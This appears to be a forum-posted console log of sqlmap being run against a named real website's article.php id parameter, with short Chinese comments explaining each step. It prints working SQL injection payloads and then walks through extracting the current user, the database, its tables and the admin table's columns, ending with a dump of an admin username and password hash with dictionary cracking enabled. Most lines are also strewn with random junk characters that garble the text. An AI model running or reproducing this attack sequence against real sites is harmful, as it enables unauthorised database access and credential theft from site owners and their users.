D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
" M' t; G1 B+ ]/ o% p9 O. f {: cms "Mysql" --current-user /* 注解:获取当前用户名称* t$ { y1 x! C* C
sqlmap/0.9 - automatic SQL injection and database takeover tool. d$ n- i+ m' c1 P9 {4 j0 g" J
http://sqlmap.sourceforge.net starting at: 16:53:546 V- B& ?+ x; `% R
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as; H% \6 e* N( k
session file
; F9 y3 E: f. ~/ }1 l. a0 D' |: ][16:53:54] [INFO] resuming injection data from session file
* ~ U+ E* D' |. t8 F7 f: j% u[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file9 l! f, q9 c+ Y4 ^8 \" V# t$ m
[16:53:54] [INFO] testing connection to the target url
) {4 n3 H- T$ Q ysqlmap identified the following injection points with a total of 0 HTTP(s) reque
" F$ M& g( C* P$ o7 |' w- I* Xsts:
, v; e. l, C% ]) E: G2 n# o---
" V* T- @8 [" ~: A# b( g( nPlace: GET
# ]! V0 t% I' W/ k/ s# yParameter: id
: K |4 I+ C n% ^; Q' l" y Type: boolean-based blind
8 W# Y F- l8 j- ]- V5 e: h Title: AND boolean-based blind - WHERE or HAVING clause0 q/ z$ {/ i& `) l4 y- B6 O
Payload: id=276 AND 799=7991 c& n- F6 C, x
Type: error-based8 a3 u( u9 P1 m* x# p& N1 U
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause4 E, ?+ T0 d+ G8 k* h
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,6 Q# s4 [! s" w% {, z% }
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
! `+ p0 @6 B/ ?& F! w9 [),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
! s( M/ T* e) \# i Type: UNION query2 P' ]$ t( }: O
Title: MySQL UNION query (NULL) - 1 to 10 columns" r* [- }3 ?6 z- ~
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
' o' R5 J1 I4 z7 S* l* q(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),. _# ]# C, z' y/ h! Z# m
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
; l* W# z. N' d4 Q; i- {' S Type: AND/OR time-based blind) V7 g( w! k, s0 c7 S' [& c
Title: MySQL > 5.0.11 AND time-based blind3 G- o, }4 }* L4 l6 j
Payload: id=276 AND SLEEP(5)# v+ i8 H9 }/ S8 a
---
6 X% q0 @# Q3 T4 i[16:53:55] [INFO] the back-end DBMS is MySQL" @. e( v2 y& r0 x- l7 G0 J5 V Y
web server operating system: Windows+ {0 W' N: Y/ ^: [7 D0 \
web application technology: Apache 2.2.11, PHP 5.3.0
' I8 S s+ T3 i( G6 O) \back-end DBMS: MySQL 5.0
$ u% k* X1 K0 k7 A, q% |5 U+ l[16:53:55] [INFO] fetching current user
. L: H; W- o$ F! w+ Y# q0 }current user: 'root@localhost'
1 ?; z) ?5 b8 a[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou$ s2 \( E) ?# B7 `, |) l
tput\www.wepost.com.hk' shutting down at: 16:53:58/ v Z5 D' U I' j% d/ c* L, ~
9 f( x% M9 Y; N& P* M, R m6 BD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db1 X u, v/ D2 {5 U. W
ms "Mysql" --current-db /*当前数据库# i* N8 X& n* r3 {1 p. `3 [
sqlmap/0.9 - automatic SQL injection and database takeover tool: o% L" S0 y: m) S; R
http://sqlmap.sourceforge.net starting at: 16:54:16
' j2 S5 Z- Y$ O* v C H[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
5 L4 I2 b- _4 q6 \ session file F7 e8 y4 N, ?* u
[16:54:16] [INFO] resuming injection data from session file( k) \ j9 Y0 H; S$ q6 t4 ?% M
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file0 L* w" o6 v* N/ I2 j) G
[16:54:16] [INFO] testing connection to the target url6 J. u& R5 V4 r$ ~/ j
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
6 }& X7 I! _; t* Z; i. Msts:
/ d2 E- ^/ {& I* {4 M! c7 T---: _. a4 v! V: i7 n" B+ ]8 w
Place: GET- Q+ g0 _: Y5 k2 [
Parameter: id2 @6 R/ P* a, ~3 A" G, j" v
Type: boolean-based blind
; }+ r# b0 H/ ?& K Title: AND boolean-based blind - WHERE or HAVING clause
+ |3 X) u0 I# K, S Payload: id=276 AND 799=799* V$ [! w( G% U- B, w( _' d* g5 S
Type: error-based% M1 S! ^* A9 F0 |5 B5 [9 Q2 h" {( G
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
8 P: ]: M. G$ j( q3 X Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
+ T6 L9 d# f8 P- Q8 M* r8 \1 g120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
; ?! S. e1 M+ H0 S),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a); {" h; M& @0 p M: I3 u5 M2 O
Type: UNION query
9 n$ M0 t6 a( h, G% e; ?6 A Title: MySQL UNION query (NULL) - 1 to 10 columns
6 _# s. J( l) t0 }6 M3 f" S2 e Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
% b6 F% m2 Q8 d% [6 S(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),$ Y: e5 E- n W* Z& C
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#1 O3 b7 F0 R2 Z8 n" {3 W9 X* B
Type: AND/OR time-based blind
; ^; G! b8 g. @9 T: E Title: MySQL > 5.0.11 AND time-based blind
) C! y3 x+ k8 n- U- R! ^$ \ Payload: id=276 AND SLEEP(5): @# q) i5 y' o ?$ L: ~% U
---, n& V" m# L( y
[16:54:17] [INFO] the back-end DBMS is MySQL
$ z& O H9 U2 V1 y+ [! Kweb server operating system: Windows
2 K( B& q* o0 l/ I' c- tweb application technology: Apache 2.2.11, PHP 5.3.0
) d3 d* M0 E/ d) D( K/ Tback-end DBMS: MySQL 5.0
1 Q4 \% }8 R& W( q( u/ Y9 G$ A5 B[16:54:17] [INFO] fetching current database
6 c3 O# m' s+ H+ |( J' O2 jcurrent database: 'wepost'
* e& j. _ H2 ^% S V. a[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
% u& s2 n2 Y6 L0 s5 R, Q8 Btput\www.wepost.com.hk' shutting down at: 16:54:18. G2 \7 w4 O! [/ |9 H3 q: [ ]' b
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
+ [/ w/ [& T4 \; z" mms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
# I4 m2 E( n t J* x# r) o sqlmap/0.9 - automatic SQL injection and database takeover tool
4 I2 z/ _! U8 I) z5 u http://sqlmap.sourceforge.net starting at: 16:55:25
; W8 p/ U' N0 K ~( g2 {[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
! T# e1 F: V4 Y session file" N* Z+ L3 V. D2 H+ p
[16:55:25] [INFO] resuming injection data from session file
' J5 P; K& Y8 g/ h: e" k7 z) r[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file$ A& _% I) @5 M" I: K. h4 H
[16:55:25] [INFO] testing connection to the target url
4 j% M0 g- X$ r1 f _sqlmap identified the following injection points with a total of 0 HTTP(s) reque1 B4 u, Q( ?$ N' r7 \# |
sts:
: V7 [1 c$ R. b0 G) O---
, @9 y# w8 H) {) f% R* EPlace: GET
1 @' ^, e# u3 e; w( m: |) xParameter: id7 x4 Y4 }! C2 n: x+ f' {8 o. m
Type: boolean-based blind' K; u) `1 a1 W- U
Title: AND boolean-based blind - WHERE or HAVING clause
" W" ]6 T. R6 @, ?2 X) k. V1 R: R8 s Payload: id=276 AND 799=799
& Z+ R3 @3 x8 f7 U Type: error-based) m- |+ F1 Y2 D
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause) m' @, Z$ a' D/ L7 n9 a
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
: A1 t! B9 V) v$ ]8 q3 j, s120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,582 o8 O5 m6 J% k7 L2 I$ L
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) m8 d% @! h) _4 H" E4 I+ k8 q
Type: UNION query9 E' V- Z0 Z" M; l3 H, z
Title: MySQL UNION query (NULL) - 1 to 10 columns
7 S! e$ q& o: m# N. s2 N" g* T Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
d1 {; U* n8 t(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),( Q7 |1 R$ i$ p$ y. m7 q" T
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
8 N6 s% _# a4 P3 r Type: AND/OR time-based blind
4 u3 u; C( w, w$ D9 U% y Title: MySQL > 5.0.11 AND time-based blind
9 J1 v! v; y9 a- p% p Payload: id=276 AND SLEEP(5)
& @$ v1 K9 B) u v5 M5 F---
* ^) g+ B$ y) J8 c( A- X$ K( N6 |[16:55:26] [INFO] the back-end DBMS is MySQL
8 \/ I4 E3 {* i+ a2 Y% T, Dweb server operating system: Windows/ ~' i1 t$ f) F' I# g9 L; a, F
web application technology: Apache 2.2.11, PHP 5.3.0
* g1 e1 R, g# Y/ M9 @6 O" Fback-end DBMS: MySQL 5.0. o4 x1 I' M: @, r! @0 {
[16:55:26] [INFO] fetching tables for database 'wepost'
" Q R7 p7 H. a" `[16:55:27] [INFO] the SQL query used returns 6 entries
, Y# y' X0 F4 F0 TDatabase: wepost
) _7 X# @+ g2 _! R! E( T: j9 u[6 tables]5 p$ E& X" v% @/ N1 c/ M; l8 V- E
+-------------+
* }8 A& ]+ ]5 Q3 G6 U2 s) H| admin |
% T2 L6 l6 ?- q' ^/ a$ w/ u7 Q" K| article |/ L7 G8 R$ }! S' ~
| contributor |3 e. y% y# Q* C; d" a
| idea |
" r+ `) ?, ~+ t| image |0 F, j% L& ]+ J
| issue |
3 `% O' a/ F7 |; E* g* ~, `' h9 U/ Y+-------------+; s" N2 T2 h |
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou4 ~8 L' \' j" ]9 H m0 k
tput\www.wepost.com.hk' shutting down at: 16:55:33# T) m% g& }$ R2 F! |( ~" j
$ k5 |6 N* m4 M9 N6 V" u( [( hD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db# L3 z$ U6 f; e' o
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名" O/ I2 {- }, ?" K; ^
sqlmap/0.9 - automatic SQL injection and database takeover tool
0 A" s2 z- K" t/ b1 ^ http://sqlmap.sourceforge.net starting at: 16:56:06
/ q; K" e, W5 U5 ^2 u5 ^) Csqlmap identified the following injection points with a total of 0 HTTP(s) reque3 @. J$ S8 v7 g8 D; @. M0 J/ f
sts:
0 i! O9 s9 U9 u, ^+ X9 }( C---
- S+ P( Q3 I2 C- s) R: DPlace: GET! L6 C% ^2 N, _$ E8 I5 |2 j
Parameter: id
^3 v* a5 [2 S2 l' h Type: boolean-based blind
& h0 b* F2 \" o5 { Title: AND boolean-based blind - WHERE or HAVING clause
' K( Y% k2 D2 w3 M9 g3 t Payload: id=276 AND 799=799# B% H, ~* J4 f
Type: error-based
, Z/ S# J. d! ~! L1 H Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
7 h a5 [ E9 \0 O) `% V6 e% _9 | Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,) Z3 ]8 q0 l5 S$ y
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,581 h1 B3 \; Y3 E+ n
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
6 J7 b# ^: o" e5 S& @; R Type: UNION query7 d( o* L7 _5 d$ x4 ~# M! l
Title: MySQL UNION query (NULL) - 1 to 10 columns
- I$ M% y+ M2 t% i3 p: Z Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
6 ]9 @0 a) ? K' w& [' h% m g(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
9 M- y+ I+ [8 x7 GCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
/ {' L* A6 ^+ b7 ~/ t& O Type: AND/OR time-based blind
) \. T& g& ?1 ?. Z Title: MySQL > 5.0.11 AND time-based blind* R: b9 {# u3 P$ P S5 u
Payload: id=276 AND SLEEP(5)
" |$ D. M5 u t8 L---
4 C U" S, n# ^% b8 lweb server operating system: Windows/ }% K5 i h" S# a) o" X- c
web application technology: Apache 2.2.11, PHP 5.3.0' Z0 t0 ~2 a- S3 V) l, V- p8 D' J
back-end DBMS: MySQL 5.0
D5 e3 j# f+ Z4 L* H E[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
m! x+ j8 W( z1 Tssion': wepost, wepost9 [3 ]6 d! z/ z$ \; q! U
Database: wepost6 {: a3 T' b+ N2 _" v+ V* q$ {
Table: admin
9 P6 ]# f- W5 P2 Z6 m[4 columns]
]8 J) I8 y$ m/ [' J! z+----------+-------------+. L: r. ]* I; X0 i, D. {$ E; d
| Column | Type |: X' _/ k" H6 C0 k, x8 M! [9 B
+----------+-------------+7 q* p! m5 f& U, R% |8 O
| id | int(11) |2 M4 W6 E, i! Y% I+ Q4 w
| password | varchar(32) |* o* P' |. F& V& l
| type | varchar(10) |+ Q/ j! A% `+ J: m
| userid | varchar(20) |
* l6 i# o. x$ A* d: p- S1 t; J+----------+-------------+7 ]6 W: B1 ?% V; l! i
shutting down at: 16:56:19
9 C: `/ w8 k/ D0 Z/ l
& g0 _& b+ Z, z& c- J' [D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
3 |& m0 M) W( h" m/ E" ?ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
0 P+ y9 L9 }& b8 F2 ] sqlmap/0.9 - automatic SQL injection and database takeover tool5 u9 o; Z. c( h4 ^4 n
http://sqlmap.sourceforge.net starting at: 16:57:14: I2 _* M g- Z" I6 g0 t# x
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
. m8 |+ e( y' a0 D8 Zsts:) V' w8 J1 H$ J( `# p0 [$ q' a8 I
---$ ?; m) I' o' ]- F- q" ]
Place: GET
% l; L5 [# r2 M% H% O. qParameter: id( A3 S. G$ W6 U5 Q2 H9 d
Type: boolean-based blind
% W/ F& j+ P9 ] q7 I; d1 e# a Title: AND boolean-based blind - WHERE or HAVING clause
) t' o( X* J/ _" y6 e; k3 w: ] Payload: id=276 AND 799=799
8 K R7 w+ g+ [' h% k. a Type: error-based8 _) b& ^, }, }2 N
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
1 U- }# ?1 v; R( b- _$ v- M Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
2 t! m+ c( l! {120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
" C8 p* [( `& u2 C),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)$ U& y; d6 }% v; s W* [/ F
Type: UNION query3 ]; O+ P ^: J9 v" H
Title: MySQL UNION query (NULL) - 1 to 10 columns
3 J- M' ~1 g, I9 f) s Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR E/ m9 L& i e$ R
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
7 Y+ K6 l# T) |! o0 r% n- G. M/ BCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#5 |/ O5 {+ n% R& s4 i
Type: AND/OR time-based blind
5 O" j, Q# J8 U! b- f4 a3 Q' @ Title: MySQL > 5.0.11 AND time-based blind# r5 C m, b+ Z. U, n' K
Payload: id=276 AND SLEEP(5) j7 j& E) s9 o$ R" n% p& ~4 @
---6 w7 U) D; p4 i+ n- ^
web server operating system: Windows+ u6 x+ d" @# [ ^* k1 _; u) @' U
web application technology: Apache 2.2.11, PHP 5.3.0( b4 U5 M z( t1 {& t7 q$ J
back-end DBMS: MySQL 5.0
; O; I9 }8 t& S/ |' ?+ t9 irecognized possible password hash values. do you want to use dictionary attack o
; m2 \+ V( H/ Q" c: P. l) k# T9 G. _n retrieved table items? [Y/n/q] y' k7 |3 z( ~" f5 S% S! Z$ B
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
1 z" F5 y; P1 B* o: c! h0 ydo you want to use common password suffixes? (slow!) [y/N] y
+ y4 f$ F2 p2 X5 e4 z) jDatabase: wepost
! u {, b% }, oTable: admin0 G3 u' Z: }' g) g7 t7 S5 I) v( C
[1 entry] I4 Q( x6 A! F4 _$ T" W# U
+----------------------------------+------------+
5 O7 E, V& k0 y' S6 }$ q1 S1 F| password | userid |
; {9 V, \8 j9 D+ ^4 W0 d+----------------------------------+------------+: T6 v6 x0 p% t
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
! |) |) \3 u6 [1 [4 w6 D) {+----------------------------------+------------+
' q; k- @4 Y% d shutting down at: 16:58:14
* k0 z; c& Y) g, a: i; c, y9 C
U, K( l p) H: aD:\Python27\sqlmap> |